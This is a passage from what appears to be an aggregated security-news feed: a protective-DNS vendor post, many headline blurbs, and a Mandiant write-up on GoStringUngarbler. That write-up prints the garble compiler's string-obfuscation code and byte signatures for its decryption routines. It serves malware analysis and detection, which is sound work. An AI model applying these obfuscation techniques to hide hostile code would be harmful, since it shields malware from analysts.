filtering” for categories that are not relevant in many workplaces - gambling, shopping, and weapons for example. Prohibit employee traffic to any sites that fall into these broad categories and you eliminate some areas of risk. But HYAS Protect is also a last line of defense. HYAS Protect blocks threats based upon HYAS’s extensive and continually updated platform of infrastructure intelligence that stops: Phishing: Blocking malicious domains before users even visit them, reducing the risk of credential theft and data loss. Drive-by Downloads: Preventing employees from unknowingly downloading malware from infected websites. Command-and-Control (C2) Communication: Severing connections between employee machines and attacker-controlled servers, limiting their ability to issue instructions and exfiltrate data. Data Exfiltration: Detecting abnormal DNS requests that suggest sensitive data is being smuggled out of the organization Other threats requiring any kind of communication over the internet. By addressing these threats proactively, HYAS Protect becomes a practical yet powerful means of mitigating cyber risk. Speed vs. Security at the DNS Level While DNS plays a critical role in security, some protective DNS providers place disproportionate focus on delivering the fastest DNS resolutions. Low-latency DNS queries are essential in technologies like HYAS Protect because no one is going to accept “slow internet.” But prioritizing speed over security can leave organizations painfully vulnerable to threats. Inspecting DNS transactions in-line between a user’s request and the resulting destination requires both speed and effective identification of threats. It takes a moment to evaluate the safety and legitimacy of the requested domain. These processes introduce marginal increases in DNS resolution time—measured in milliseconds. However, this trade-off becomes negligible when weighed against the enhanced protection it provides.   Security Is Worth the Milliseconds At HYAS, our priority is comprehensive security over inconsequential increases in speed. By sacrificing only a small fraction of a second, HYAS Protect can prevent connections to malicious domains and provide invaluable intelligence about threats facing your organization. Consider these trade-offs: Blocking a single phishing domain could mean saving an entire network from compromise. Preventing malware installation or stopping a ransomware attack before it begins justifies an imperceptible delay in DNS resolution. Identifying abnormal traffic patterns early can thwart data breaches that could otherwise cost millions in damages. The reality is, employees and end users rarely notice the slight increase in DNS response time. What they will notice is a secure browsing experience, seamless operations, and protection from costly interruptions caused by cyber incidents. Beyond Blocking—Enabling Actionable Insights Modern protective DNS solutions not only secure but also equip cybersecurity teams with actionable threat intelligence. HYAS Protect includes features that enhance visibility and offer insights into: Traffic to Suspicious Sites: Detect patterns or anomalies pointing to compromised devices or risky user behavior. High-Risk Users: Identify employees who may be repeatedly attempting to access unsafe domains, allowing targeted education and policy enforcement, or the identification of an insider threat. Threat Trends Over Time: Monitor recurring malicious activity to refine security postures and proactively address emerging threats. Empowered with detailed data from DNS monitoring, security professionals can make informed decisions faster, mitigate risks more effectively, and prevent future breaches.   Why Smart Security Leaders Choose DNS-based Protection Adopting solutions like HYAS Protect is not just a prudent step; it’s a necessity for organizations facing today’s complex threat landscape. The benefits of this approach are clear: Proactive Defense: Leverage DNS as a blanket defense against many kinds of threats. Enhanced Visibility: Gain actionable insights into your network traffic, enabling better threat identification and decision-making. Minimal Trade-Off: Only a few milliseconds of additional DNS resolution time, virtually undetectable to users in exchange for robust enterprise security. When organizations invest in protective DNS solutions, they are fortifying their networks, empowering their security teams, and making smart, calculated decisions for long-term resilience against cyber attacks. Building Resilience with DNS Defense Individual layers of your cybersecurity stack will fail, so make sure you are implementing a security layer that functions as both a first line and a last line of defense for your organization. HYAS Protect mitigates the risk created by all forms of cyber attacks requiring internet communications. It provides real-time protection that keeps your business moving at a fast pace, and it is both easy to use and integrates with other components of your security stack.  See why security leaders choose HYAS to defend their networks and gain visibility that protects their business. Start your free trial today and experience the difference.

https://www.hyas.com/blog/the-dns-line-of-defense-when-others-fail
MixMode Uncovers Nation-State Attacks, Insider Threats, and Regulatory Risks in Critical Infrastructure Environment within 3 Days of Deployment
2025-03-05T16:14:00Z | 1741191240

In our newest MixMode report, we break down how a critical infrastructure provider uncovered active nation-state and insider threats within three days of deploying our AI-driven security platform.

https://mixmode.ai/blog/mixmode-uncovers-nation-state-attacks-insider-threats-and-regulatory-risks-in-critical-infrastructure-environment-within-3-days-of-deployment/
Cato CTRL Threat Research: Stuck in the Past – How Hackers Exploit Years-Old CVEs for Cryptojacking
2025-03-05T16:05:06Z | 1741190706

Executive Summary  While organizations focus on addressing the latest zero-day threats, threat actors continue to profit by targeting weaknesses that should have been resolved long ago. Some of these Common Vulnerability and Exposures (CVEs) date back nearly a decade, yet they remain heavily exploited today. This trend proves that old flaws never truly disappear. Cato... The post Cato CTRL Threat Research: Stuck in the Past – How Hackers Exploit Years-Old CVEs for Cryptojacking appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-hackers-exploit-years-old-cve-for-profit/
2024 Retrospect: Unveiling the Evolving Cyber Threat Landscape
2025-03-05T16:04:18Z | 1741190658

The past year saw a surge in cyber threats, with DDoS-for-hire services thriving, hacktivists forming alarming alliances with state-sponsored actors, and web application vulnerabilities leading to devastating breaches. Our latest report, 2024 Retrospect: Observations from the Past Year’s DDoS and Web Application Attack Landscape, dives deep into these emerging trends, providing exclusive insights from our Threat Protection team’s real-world data.

https://blog.riskrecon.com/resources/reports-and-whitepapers/2024-retrospect-unveiling-the-evolving-cyber-threat-landscape
LABScon24 Replay | Farmyard Gossip: The Foreign Footprint in US Agriculture
2025-03-05T14:00:02Z | 1741183202

Kristin Del Rosso & Madeleine Devost explore the growing trend of foreign ownership of farmland and its implications for national security.

https://www.sentinelone.com/labs/labscon24-replay-farmyard-gossip-the-foreign-footprint-in-us-agriculture/
GoStringUngarbler: Deobfuscating Strings in Garbled Binaries
2025-03-05T14:00:00Z | 1741183200

Written by: Chuong Dong Overview In our day-to-day work, the FLARE team often encounters malware written in Go that is protected using garble. While recent advancements in Go analysis from tools like IDA Pro have simplified the analysis process, garble presents a set of unique challenges, including stripped binaries, function name mangling, and encrypted strings. Garble's string encryption, while relatively straightforward, significantly hinders static analysis. In this blog post, we'll detail garble’s string transformations and the process of automatically deobfuscating them. We're also introducing GoStringUngarbler, a command-line tool written in Python that automatically decrypts strings found in garble-obfuscated Go binaries. This tool can streamline the reverse engineering process by producing a deobfuscated binary with all strings recovered and shown in plain text, thereby simplifying static analysis, malware detection, and classification. aside_block ), ('btn_text', 'Download now'), ('href', 'https://github.com/mandiant/gostringungarbler'), ('image', None)])]> Garble Obfuscating Compiler Before detailing the GoStringUngarbler tool, we want to briefly explain how the garble compiler modifies the build process of Go binaries. By wrapping around the official Go compiler, garble performs transformations on the source code during compilation through Abstract Syntax Tree (AST) manipulation using Go’s go/ast library. Here, the obfuscating compiler modifies program elements to obfuscate the produced binary while preserving the semantic integrity of the program. Once transformed by garble, the program’s AST is fed back into the Go compilation pipeline, producing an executable that is harder to reverse engineer and analyze statically.  While garble can apply a variety of transformations to the source code, this blog post will focus on its "literal" transformations. When garble is executed with the -literals flag, it transforms all literal strings in the source code and imported Go libraries into an obfuscated form. Each string is encoded and wrapped behind a decrypting function, thwarting static string analysis.  For each string, the obfuscating compiler can randomly apply one of the following literal transformations. We'll explore each in greater detail in subsequent sections. Stack transformation: This method implements runtime encoding to strings stored directly on the stack. Seed transformation: This method employs a dynamic seed-based encryption mechanism where the seed value evolves with each encrypted byte, creating a chain of interdependent encryption operations. Split transformation: This method fragments the encrypted strings into multiple chunks, each to be decrypted independently in a block of a main switch statement. Stack Transformation The stack transformation in garble implements runtime encrypting techniques that operate directly on the stack, using three distinct transformation types: simple, swap, and shuffle. These names are taken directly from the garble’s source code. All three perform cryptographic operations with the string residing on the stack, but each differs in complexity and approach to data manipulation. Simple transformation: This transformation applies byte-by-byte encoding using a randomly generated mathematical operator and a randomly generated key of equal length to the input string. Swap transformation: This transformation applies a combination of byte-pair swapping and position-dependent encoding, where pairs of bytes are shuffled and encrypted using dynamically generated local keys. Shuffle transformation: This transformation applies multiple layers of encryption by encoding the data with random keys, interleaving the encrypted data with its keys, and applying a permutation with XOR-based index mapping to scatter the encrypted data and keys throughout the final output. Simple Transformation This transformation implements a straightforward byte-level encoding scheme at the AST level. The following is the implementation from the garble repository. In Figure 1 and subsequent code samples taken from the garble repository, comments were added by the author for readability. // Generate a random key with the same length as the input string key := make([]byte, len(data)) // Fill the key with random bytes obfRand.Read(key) // Select a random operator (XOR, ADD, SUB) to be used for encryption op := randOperator(obfRand) // Encrypt each byte of the data with the key using the random operator for i, b := range key { data[i] = evalOperator(op, data[i], b) } Figure 1: Simple transformation implementation The obfuscator begins by generating a random key of equal length to the input string. It then randomly selects a reversible arithmetic operator (XOR, addition, or subtraction) that will be used throughout the encoding process. The obfuscation is performed by iterating through the data and key bytes simultaneously, applying the chosen operator between each corresponding pair to produce the encoded output. Figure 2 shows the decompiled code produced by IDA of a decrypting subroutine of this transformation type. Figure 2: Decompiled code of a simple transformation decrypting subroutine Swap Transformation The swap transformation uses a byte-shuffling and encryption algorithm to encrypt a string literal. Figure 3 shows its implementation from the garble repository. // Determines how many swap operations to perform based on data length func generateSwapCount(obfRand *mathrand.Rand, dataLen int) int { // Start with number of swaps equal to data length swapCount := dataLen // Calculate maximum additional swaps (half of data length) maxExtraPositions := dataLen / 2 // Add a random amount if we can add extra positions if maxExtraPositions > 1 { swapCount += obfRand.Intn(maxExtraPositions) } // Ensure swap count is even by incrementing if odd if swapCount%2 != 0 { swapCount++ } return swapCount } func (swap) obfuscate(obfRand *mathrand.Rand, data []byte) *ast.BlockStmt { // Generate number of swap operations to perform swapCount := generateSwapCount(obfRand, len(data)) // Generate a random shift key shiftKey := byte(obfRand.Uint32()) // Select a random reversible operator for encryption op := randOperator(obfRand) // Generate list of random positions for swapping bytes positions := genRandIntSlice(obfRand, len(data), swapCount) // Process pairs of positions in reverse order for i := len(positions) - 2; i >= 0; i -= 2 { // Generate a position-dependent local key for each pair localKey := byte(i) + byte(positions[i]^positions[i+1]) + shiftKey // Perform swap and encryption: // - Swap positions[i] and positions[i+1] // - Encrypt the byte at each position with the local key data[positions[i]], data[positions[i+1]] = evalOperator(op, data[positions[i+1]], localKey), evalOperator(op, data[positions[i]], localKey) } ... Figure 3: Swap transformation implementation The transformation begins by generating an even number of random swap positions, which is determined based on the data length plus a random number of additional positions (limited to half the data length). The compiler then randomly generates a list of random swap positions with this length. The core obfuscation process operates by iterating through pairs of positions in reverse order, performing both a swap operation and encryption on each pair. For each iteration, it generates a position-dependent local encryption key by combining the iteration index, the XOR result of the current position pair, and a random shift key. This local key is then used to encrypt the swapped bytes with a randomly selected reversible operator. Figure 4 shows the decompiled code produced by IDA of a decrypting subroutine of the swap transformation. Figure 4: Decompiled code of a swap transformation decrypting subroutine Shuffle Transformation The shuffle transformation is the most complicated of the three stack transformation types. Here, garble applies its obfuscation by encrypting the original string with random keys, interleaving the encrypted data with its keys, and scattering the encrypted data and keys throughout the final output. Figure 5 shows the implementation from the garble repository. // Generate a random key with the same length as the original string key := make([]byte, len(data)) obfRand.Read(key) // Constants for the index key size bounds const ( minIdxKeySize = 2 maxIdxKeySize = 16 ) // Initialize index key size to minimum value idxKeySize := minIdxKeySize // Potentially increase index key size based on input data length if tmp := obfRand.Intn(len(data)); tmp > idxKeySize { idxKeySize = tmp } // Cap index key size at maximum value if idxKeySize > maxIdxKeySize { idxKeySize = maxIdxKeySize } // Generate a secondary key (index key) for index scrambling idxKey := make([]byte, idxKeySize) obfRand.Read(idxKey) // Create a buffer that will hold both the encrypted data and the key fullData := make([]byte, len(data)+len(key)) // Generate random operators for each position in the full data buffer operators := make([]token.Token, len(fullData)) for i := range operators { operators[i] = randOperator(obfRand) } // Encrypt data and store it with its corresponding key // First half contains encrypted data, second half contains the key for i, b := range key { fullData[i], fullData[i+len(data)] = evalOperator(operators[i], data[i], b), b } // Generate a random permutation of indices shuffledIdxs := obfRand.Perm(len(fullData)) // Apply the permutation to scatter encrypted data and keys shuffledFullData := make([]byte, len(fullData)) for i, b := range fullData { shuffledFullData[shuffledIdxs[i]] = b } // Prepare AST expressions for decryption args := []ast.Expr{ast.NewIdent("data")} for i := range data { // Select a random byte from the index key keyIdx := obfRand.Intn(idxKeySize) k := int(idxKey[keyIdx]) // Build AST expression for decryption: // 1. Uses XOR with index key to find the real positions of data and key // 2. Applies reverse operator to decrypt the data using the corresponding key args = append(args, operatorToReversedBinaryExpr( operators[i], // Access encrypted data using XOR-ed index ah.IndexExpr("fullData", &ast.BinaryExpr{X: ah.IntLit(shuffledIdxs[i] ^ k), Op: token.XOR, Y: ah.CallExprByName("int", ah.IndexExpr("idxKey", ah.IntLit(keyIdx)))}), // Access corresponding key using XOR-ed index ah.IndexExpr("fullData", &ast.BinaryExpr{X: ah.IntLit(shuffledIdxs[len(data)+i] ^ k), Op: token.XOR, Y: ah.CallExprByName("int", ah.IndexExpr("idxKey", ah.IntLit(keyIdx)))}), )) } Figure 5: Shuffle transformation implementation Garble begins by generating two types of keys: a primary key of equal length to the input string for data encryption and a smaller index key (between two and 16 bytes) for index scrambling. The transformation process then occurs in the following four steps: Initial encryption: Each byte of the input data is encrypted using a randomly generated reversible operator with its corresponding key byte. Data interleaving: The encrypted data and key bytes are combined into a single buffer, with encrypted data in the first half and corresponding keys in the second half. Index permutation: The key-data buffer undergoes a random permutation, scattering both the encrypted data and keys throughout the buffer. Index encryption: Access to the permuted data is further obfuscated by XOR-ing the permuted indices with randomly selected bytes from the index key. Figure 6 shows the decompiled code produced by IDA of a decrypting subroutine of the shuffle transformation. Figure 6: Decompiled code of a shuffle transformation decrypting subroutine Seed Transformation The seed transformation implements a chained encoding scheme where each byte’s encryption depends on the previous encryptions through a continuously updated seed value. Figure 7 shows the implementation from the garble repository. // Generate random initial seed value seed := byte(obfRand.Uint32()) // Store original seed for later use in decryption originalSeed := seed // Select a random reversible operator for encryption op := randOperator(obfRand) var callExpr *ast.CallExpr // Encrypt each byte while building chain of function calls for i, b := range data { // Encrypt current byte using current seed value encB := evalOperator(op, b, seed) // Update seed by adding encrypted byte seed += encB if i == 0 { // Start function call chain with first encrypted byte callExpr = ah.CallExpr(ast.NewIdent("fnc"), ah.IntLit(int(encB))) } else { // Add subsequent encrypted bytes to function call chain callExpr = ah.CallExpr(callExpr, ah.IntLit(int(encB))) } } ... Figure 7: Seed transformation implementation Garble begins by randomly generating a seed value to be used for encryption. As the compiler iterates through the input string, each byte is encrypted by applying the random operator with the current seed, and the seed is updated by adding the encrypted byte. In this seed transformation, each byte’s encryption depends on the result of the previous one, creating a chain of dependencies through the continuously updated seed. In the decryption setup, as shown in the IDA decompiled code in Figure 8, the obfuscator generates a chain of calls to a decrypting function. For each encrypted byte starting with the first one, the decrypting function applies the operator to decrypt it with the current seed and updates the seed by adding the encrypted byte to it. Because of this setup, subroutines of this transformation type are easily recognizable in the decompiler and disassembly views due to the multiple function calls it makes in the decryption process. Figure 8: Decompiled code of a seed transformation decrypting subroutine Figure 9: Disassembled code of a seed transformation decrypting subroutine Split Transformation The split transformation is one of the more sophisticated string transformation techniques by garble, implementing a multilayered approach that combines data fragmentation, encryption, and control flow manipulation. Figure 10 shows the implementation from the garble repository. func (split) obfuscate(obfRand *mathrand.Rand, data []byte) *ast.BlockStmt { var chunks [][]byte // For small input, split into single bytes // This ensures even small payloads get sufficient obfuscation if len(data)/maxChunkSize < minCaseCount { chunks = splitIntoOneByteChunks(data) } else { chunks = splitIntoRandomChunks(obfRand, data) } // Generate random indexes for all chunks plus two special cases: // - One for the final decryption operation // - One for the exit condition indexes := obfRand.Perm(len(chunks) + 2) // Initialize the decryption key with a random value decryptKeyInitial := byte(obfRand.Uint32()) decryptKey := decryptKeyInitial // Calculate the final decryption key by XORing it with position-dependent values for i, index := range indexes[:len(indexes)-1] { decryptKey ^= byte(index * i) } // Select a random reversible operator for encryption op := randOperator(obfRand) // Encrypt all data chunks using the selected operator and key encryptChunks(chunks, op, decryptKey) // Get special indexes for decrypt and exit states decryptIndex := indexes[len(indexes)-2] exitIndex := indexes[len(indexes)-1] // Create the decrypt case that reassembles the data switchCases := []ast.Stmt{&ast.CaseClause{ List: []ast.Expr{ah.IntLit(decryptIndex)}, Body: shuffleStmts(obfRand, // Exit case: Set next state to exit &ast.AssignStmt{ Lhs: []ast.Expr{ast.NewIdent("i")}, Tok: token.ASSIGN, Rhs: []ast.Expr{ah.IntLit(exitIndex)}, }, // Iterate through the assembled data and decrypt each byte &ast.RangeStmt{ Key: ast.NewIdent("y"), Tok: token.DEFINE, X: ast.NewIdent("data"), Body: ah.BlockStmt(&ast.AssignStmt{ Lhs: []ast.Expr{ah.IndexExpr("data", ast.NewIdent("y"))}, Tok: token.ASSIGN, Rhs: []ast.Expr{ // Apply the reverse of the encryption operation operatorToReversedBinaryExpr( op, ah.IndexExpr("data", ast.NewIdent("y")), // XOR with position-dependent key ah.CallExpr(ast.NewIdent("byte"), &ast.BinaryExpr{ X: ast.NewIdent("decryptKey"), Op: token.XOR, Y: ast.NewIdent("y"), }), ), }, }), }, ), }} // Create switch cases for each chunk of data for i := range chunks { index := indexes[i] nextIndex := indexes[i+1] chunk := chunks[i] appendCallExpr := &ast.CallExpr{ Fun: ast.NewIdent("append"), Args: []ast.Expr{ast.NewIdent("data")}, } ... // Create switch case for this chunk switchCases = append(switchCases, &ast.CaseClause{ List: []ast.Expr{ah.IntLit(index)}, Body: shuffleStmts(obfRand, // Set next state &ast.AssignStmt{ Lhs: []ast.Expr{ast.NewIdent("i")}, Tok: token.ASSIGN, Rhs: []ast.Expr{ah.IntLit(nextIndex)}, }, // Append this chunk to the collected data &ast.AssignStmt{ Lhs: []ast.Expr{ast.NewIdent("data")}, Tok: token.ASSIGN, Rhs: []ast.Expr{appendCallExpr}, }, ), }) } // Final block creates the state machine loop structure return ah.BlockStmt( ... // Update decrypt key based on current state and counter Body: ah.BlockStmt( &ast.AssignStmt{ Lhs: []ast.Expr{ast.NewIdent("decryptKey")}, Tok: token.XOR_ASSIGN, Rhs: []ast.Expr{ &ast.BinaryExpr{ X: ast.NewIdent("i"), Op: token.MUL, Y: ast.NewIdent("counter"), }, }, }, // Main switch statement as the core of the state machine &ast.SwitchStmt{ Tag: ast.NewIdent("i"), Body: ah.BlockStmt(shuffleStmts(obfRand, switchCases...)...), }), Figure 10: Split transformation implementation The transformation begins by splitting the input string into chunks of varying sizes. Shorter strings are broken into individual bytes, while longer strings are divided into random-sized chunks of up to four bytes. The transformation then constructs a decrypting mechanism using a switch-based control flow pattern. Rather than processing chunks sequentially, the compiler generates a randomized execution order through a series of switch cases. Each case handles a specific chunk of data, encrypting it with a position-dependent key derived from both the chunk's position and a global encryption key. In the decryption setup, as shown in the IDA decompiled code in Figure 11, the obfuscator first collects the encrypted data by going through each chunk in their corresponding order. In the final switch case, the compiler performs a final pass to XOR-decrypt the encrypted buffer. This pass uses a continuously updated key that depends on both the byte position and the execution path taken through the switch statement to decrypt each byte. Figure 11: Decompiled code of a split transformation decrypting subroutine GoStringUngarbler: Automatic String Deobfuscator To systematically approach string decryption automation, we first consider how this can be done manually. From our experience, the most efficient manual approach leverages dynamic analysis through a debugger. Upon finding a decrypting subroutine, we can manipulate the program counter to target the subroutine's entry point, execute until the ret instruction, and extract the decrypted string from the return buffer. To perform this process automatically, the primary challenge lies in identifying all decrypting subroutines introduced by garble's transformations. Our analysis revealed a consistent pattern—decrypted strings are always processed through Go's runtime_slicebytetostring function before being returned by the decrypting subroutine. This observation provides a reliable anchor point, allowing us to construct regular expression (regex) patterns to automatically detect these subroutines. String Encryption Subroutine Patterns Through analyzing the disassembled code, we have identified consistent instruction patterns for each string transformation variant. For each transformation on 64-bit binaries, rbx is used to store the decrypted string pointer, and rcx is assigned with the length of the decrypted string. The main difference between the transformations is the way these two registers are populated before the call to runtime_slicebytetostring. # Go compiler v1.21 -> v1.23 (x64) # Stack Transformation Epilogue Pattern 48 8D 5C ?? ?? lea rbx, [rsp+] # decrypted string pointer B9 ?? ?? ?? ?? mov ecx, # decrypted string length E8 ?? ?? ?? ?? call runtime_slicebytetostring 48 83 ?? ?? add rsp, # epilogue clean up 5D pop rbp C3 retn --------------------------------------- # Split Transformation Epilogue Pattern 31 C0 xor eax, eax 48 89 ?? mov rbx, # decrypted string pointer 48 89 ?? mov rcx, # decrypted string length E8 ?? ?? ?? ?? call runtime_slicebytetostring 48 83 ?? ?? add rsp, 5D pop rbp C3 retn --------------------------------------- # Seed Transformation Epilogue Pattern 48 8B ?? mov rbx, [] # decrypted string pointer 48 8B ?? ?? mov rcx, [+8] # decrypted string length 31 C0 xor eax, eax E8 ?? ?? ?? ?? call runtime_slicebytetostring 48 83 ?? ?? add rsp, 5D pop rbp C3 retn Figure 12: Epilogue patterns of garble’s decrypting subroutines Through the assembly patterns in Figure 12, we develop regex patterns corresponding to each of garble's transformation types, which allows us to automatically identify string decrypting subroutines with high precision. To extract the decrypted string, we must find the subroutine’s prologue and perform instruction-level emulation from this entry point until runtime_slicebytestring is called. For binaries of Go versions v1.21 to v1.23, we observe two main patterns of instructions in the subroutine prologue that perform the Go stack check. # Go prologue pattern 1 49 3B ?? ?? cmp rsp, [+] 0F 86 ?? ?? ?? ?? jbe ------------------------ # Go prologue pattern 2 49 3B ?? ?? cmp rsp, [+] 76 ?? jbe short Figure 13: Prologue instruction patterns of Go subroutines These instruction patterns in the Go prologue serve as reliable entry point markers for emulation. The implementation in GoStringUngarbler leverages these structural patterns to establish reliable execution contexts for the unicorn emulation engine, ensuring accurate string recovery across various garble string transformations. Figure 14 shows the output of our automated extraction framework, where GoStringUngarbler is able to identify and emulate all decrypting subroutines. Figure 14: GoStringUngarbler’s string extraction output From these instruction patterns, we have derived a YARA rule for detecting samples that are obfuscated with garble’s literal transformation. The rule can be found in Mandiant's GitHub repository. Deobfuscation: Subroutine Patching While extracting obfuscated strings can aid malware detection through signature-based analysis, this alone is not useful for reverse engineers conducting static analysis. To aid reverse engineering efforts, we've implemented a binary deobfuscation approach leveraging the emulation results.  Although developing an IDA plugin would have streamlined our development process, we recognize that not all malware analysts have access to, or prefer to use, IDA Pro. To make our tool more accessible, we developed GoStringUngarbler as a standalone Python utility to process binaries protected by garble. The tool can deobfuscate and produce functionally identical executables with recovered strings stored in plain text, improving both reverse engineering analysis and malware detection workflows. For each identified decrypting subroutine, we implement a strategic patching methodology, replacing the original code with an optimized stub while padding the remaining subroutine space with INT3 instructions (Figure 15). xor eax, eax ; clear return register lea rbx, ; Load effective address of decrypted string mov ecx, ; populate string length call runtime_slicebytetostring ; convert slice to Go string ret ; return the decrypted string Figure 15: Function stub to patch over garble’s decrypting subroutines Initially, we considered storing recovered strings within an existing binary section for efficient referencing from the patched subroutines. However, after examining obfuscated binaries, we found that there is not enough space within existing sections to consistently accommodate the deobfuscated strings. On the other hand, adding a new section, while feasible, would introduce unnecessary complexity to our tool. Instead, we opt for a more elegant space utilization strategy by leveraging the inherent characteristics of garble's string transformations. In our tool, we implement in-place string storage by writing the decrypted string directly after the patched stub, capitalizing on the guaranteed available space from decrypting routines: Stack transformation: The decrypting subroutine stores and processes encrypted strings on the stack, providing adequate space through their data manipulation instructions. The instructions originally used for pushing encrypted data onto the stack create a natural storage space for the decrypted string. Seed transformation: For each character, the decrypting subroutine requires a call instruction to decrypt it and update the seed. This is more than enough space to store the decrypted bytes. Split transformation: The decrypting subroutine contains multiple switch cases to handle fragmented data recovery and decryption. These extensive instruction sequences guarantee sufficient space for the decrypted string data. Figure 16 and Figure 17 show the disassembled and decompiled output of our patching framework, where GoStringUngarbler has deobfuscated a decrypting subroutine to display the recovered original string. Figure 16: Disassembly view of a deobfuscated decrypting subroutine Figure 17: Decompiled view of a deobfuscated decrypting subroutine Downloading GoStringUngarbler GoStringUngarbler is now available as an open-source tool in Mandiant's GitHub repository.  The installation requires Python3 and Python dependencies from the requirements.txt file. Future Work Deobfuscating binaries generated by garble presents a specific challenge—its dependence on the Go compiler for obfuscation means that the calling convention can evolve between Go versions. This change can potentially invalidate the regular expression patterns used in our deobfuscation process. To mitigate this, we've designed GoStringUngarbler with a modular plugin architecture. This allows for new plugins to be easily added with updated regular expressions to handle variations introduced by new Go releases. This design ensures the tool's long-term adaptability to future changes in garble’s output. Currently, GoStringUngarbler primarily supports garble-obfuscated PE and ELF binaries compiled with Go versions 1.21 through 1.23. We are continuously working to expand this range as the Go compiler and garble are updated. Acknowledgments Special thanks to Nino Isakovic and Matt Williams for their review and continuous feedback throughout the development of GoStringUngarbler. Their insights and suggestions have been invaluable in shaping and refining the tool’s final implementation. We are also grateful to the FLARE team members for their review of this blog post publication to ensure its technical accuracy and clarity. Additional thanks to OALabs for their valuable insights from their initial research on garble’s string encryption. Finally, we want to acknowledge the developers of garble for their outstanding work on this obfuscating compiler. Their contributions to the software protection field have greatly advanced both offensive and defensive security research on Go binary analysis.

https://cloud.google.com/blog/topics/threat-intelligence/gostringungarbler-deobfuscating-strings-in-garbled-binaries/
Etude de cas : Comment Hunters International et ses affiliés ciblent vos hyperviseurs
2025-03-05T13:33:37Z | 1741181617

https://www.synacktiv.com/publications/etude-de-cas-comment-hunters-international-et-ses-affilies-ciblent-vos-hyperviseurs.html
SAMSØE SAMSØE: innovating fashion retail with Cisco technology
2025-03-05T13:00:00Z | 1741179600

SAMSØE SAMSØE is redefining retail by seamlessly integrating tradition with technology, transforming the shopping experience.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/samsoe-samsoe-innovating-fashion-retail-with-cisco-technology.html
SAMSØE SAMSØE: innovating fashion retail with Cisco technology
2025-03-05T13:00:00Z | 1741179600

SAMSØE SAMSØE is redefining retail by seamlessly integrating tradition with technology, transforming the shopping experience.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/samsoe-samsoe-innovating-fashion-retail-with-cisco-technology.html
Zero trust 1.0
2025-03-05T10:07:52Z | 1741169272

Zero trust architecture design principles 1.0 launched.

https://www.ncsc.gov.uk/blog-post/zero-trust-1-0
Why cloud first is not a security problem
2025-03-05T10:02:29Z | 1741168949

Using the cloud securely should be your primary concern - not the underlying security of the public cloud.

https://www.ncsc.gov.uk/blog-post/why-cloud-first-is-not-a-security-problem
Kids behaving badly online? Here's what parents can do
2025-03-05T10:00:00Z | 1741168800

By taking time to understand and communicate the impact of undesirable online behavior, you can teach your kids an invaluable set of life lessons for a new digital age

https://www.welivesecurity.com/en/kids-online/kids-behaving-badly-online-heres-how-parents-can-help/
Protecting system administration with PAM
2025-03-05T09:52:44Z | 1741168364

Remote system administration provides powerful and flexible access to systems and services.

https://www.ncsc.gov.uk/blog-post/protecting-system-administration-with-pam
Her Majesty Queen Elizabeth II and GCHQ
2025-03-05T09:09:19Z | 1741165759

We reflect on Her Majesty's long association with GCHQ and the NCSC.

https://www.ncsc.gov.uk/news/her-majesty-queen-elizabeth-ii-and-gchq
New Sandworm malware Cyclops Blink replaces VPNFilter
2025-03-05T09:07:36Z | 1741165656

The Sandworm actor has replaced the exposed VPNFilter malware with a new more advanced framework.

https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter
Detection engineering at scale: one step closer (part three)
2025-03-05T08:49:13Z | 1741164553

Following our first article explaining our detection approach and associated challenges, the second one detailing the regular and automated actions implemented through our CI/CD pipelines, we will now conclude this series by presenting the continuous improvement loop that allows us to achieve our long-term objectives. La publication suivante Detection engineering at scale: one step closer (part three) est un article de Sekoia.io Blog.

https://blog.sekoia.io/detection-engineering-at-scale-one-step-closer-part-three/
ADKAR: 5 stages to manage the human side of SASE change
2025-03-05T07:43:34Z | 1741160614

Change isn’t optional—IT leaders know this better than anyone.   IT has always been the backbone of the business, keeping everything secure, connected, and efficient. But the demands on IT—and the business—have changed. Cloud adoption, hybrid work, competitive pressures, and rising costs have exposed the cracks in legacy architectures and pushed them past their limits.   Patching... The post ADKAR: 5 stages to manage the human side of SASE change   appeared first on Cato Networks.

https://www.catonetworks.com/blog/adkar-5-stages-manage-human-side-of-sase-change/
EvilLoader: Unpatched Telegram for Android Vulnerability Disclosed
2025-03-05T07:26:57Z | 1741159617

A newly disclosed in Telegram for Android, dubbed EvilLoader, allows attackers to disguise malicious APKs as video files, potentially leading to unauthorized malware installations on users' devices. The post EvilLoader: Unpatched Telegram for Android Vulnerability Disclosed first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/03/05/evilloader-unpatched-telegram-for-android-vulnerability-disclosed/
JSAC2025 -Day 1-
2025-03-05T06:00:00Z | 1741154400

On January 21 and 22, 2025, JPCERT/CC held its annual technical conference JSAC, aiming at enhancing the skills and knowledge of security analysts. The conference brought experts in the field of cyber security together to share technical insights related to...

https://blogs.jpcert.or.jp/en/2025/03/jsac2025day1.html
Search Central Live is going to Madrid
2025-03-05T06:00:00Z | 1741154400

We're very excited to announce that Search Central Live is going to Madrid for the first time on April 9! The event will have a mix of presenters from the Google Search, News, and Partnerships teams and the content will be delivered in English and Spanish, but we'll have live translation.

https://developers.google.com/search/blog/2025/03/search-central-live-madrid
NSFOCUS Selected in Frost Radar™: Modern Security Information and Event Management, 2024
2025-03-05T01:29:37Z | 1741138177

Santa Clara, Calif. Feb 26, 2024 – NSFOCUS, a global provider of intelligent hybrid security solutions, announced that it has been featured in Frost Radar™: Modern Security Information and Event Management, 2024 released by Frost & Sullivan, an internationally renowned market research institution, and became the only vendor in the Asia-Pacific region selected for this report. According to […] The post NSFOCUS Selected in Frost Radar™: Modern Security Information and Event Management, 2024 appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-selected-in-frost-radar-modern-security-information-and-event-management-2024/
FIRST Announces Global Event Series to Unite Incident Response and Security Teams Worldwide
2025-03-05T00:00:00Z | 1741132800

Flagship events in Raleigh, Berlin, and Copenhagen set to strengthen international cybersecurity collaboration amid surge in cross-border security incidents

https://www.first.org/newsroom/releases/20250305
FIRST Announces Global Event Series to Unite Incident Response and Security Teams Worldwide
2025-03-05T00:00:00Z | 1741132800

